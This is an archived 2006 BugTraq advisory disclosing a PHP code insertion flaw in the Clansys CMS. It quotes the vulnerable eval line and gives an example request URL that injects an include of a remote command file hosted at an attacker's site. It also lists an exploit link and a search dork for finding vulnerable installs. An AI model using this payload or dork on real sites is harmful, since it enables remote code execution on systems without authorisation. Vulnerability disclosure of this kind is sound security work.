BugTraq
Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability. Apr 23 2006 09:03PM
Mustafa Can Bjorn IPEKCI (nukedx nukedx com)

--Security Report--
Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 23/04/06 21:07 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: Clansys (http://www.clansys.de.vu/)
Version: 1.1 and prior versions must be affected.
About: Via this methods remote attacker can insert PHP code to Clansys.
The page parameter in index.php did not sanitized properly.
You can found vulnerable code at line 126 as an
Code->
eval("?>" . $output);
<-Code
Purely nice coding isn't it?;)
Level: Highly Critical
---
How&Example:
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE ->
http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://y
ourhost.com/cmd.txt?
With this example remote attacker can include arbitrary PHP files..
---
Timeline:
* 23/04/2006: Vulnerability found.
* 23/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=29
---
Dorks: "ClanSys v1.1"
---
Credits: WW, str0ke , n0m3rcy and all my friends
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=29
---
PS: Corrected example

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus